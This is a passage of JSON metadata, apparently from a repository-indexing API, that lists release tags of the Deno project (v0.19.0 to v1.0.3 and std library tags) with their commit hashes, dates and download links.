oland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re